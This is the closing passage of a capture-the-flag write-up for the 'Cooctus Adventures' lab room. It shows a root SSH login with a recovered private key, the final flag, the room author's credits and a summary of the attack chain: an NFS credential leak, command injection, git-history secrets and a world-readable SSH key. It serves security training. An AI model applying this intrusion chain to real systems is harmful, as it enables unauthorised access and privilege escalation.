ssh -i /tmp/root_rsa root@10.48.183.254
cat root.txt
THM{H4CK3D_BY_C00CTUS_CL4N}

Credits

First of all thank you for checking out my room! It took me way too long to put together so I hope you had some fun.

Also thanks to these wonderful people:

  • Varg - For creating the amazing Cooctus Clan designs

  • NinjaJc01 - For the Overpass series, tips & help with the theme and box development

  • Paradox - Emotional support & box dev tips

  • Szymex - Hosting the modded Minecraft server

Conclusion

Cooctus Adventures is a well-crafted room that rewards methodical enumeration at every stage. The initial foothold came from an exposed NFS share leaking credentials, which led to a web login and a command injection vulnerability in the CAT application. From there, lateral movement required reading and reversing code — ROT13 in SniffingCat.py, obfuscated C macros in the Tuxling challenges, and GPG decryption for the key fragments. Git history forensics revealed Varg's credentials, and the final privilege escalation exploited a world-readable SSH key exposed by unmounting a filesystem overlay. The key takeaway is that enumeration doesn't stop after initial access — every user's home directory and every readable file is a potential stepping stone to the next flag.
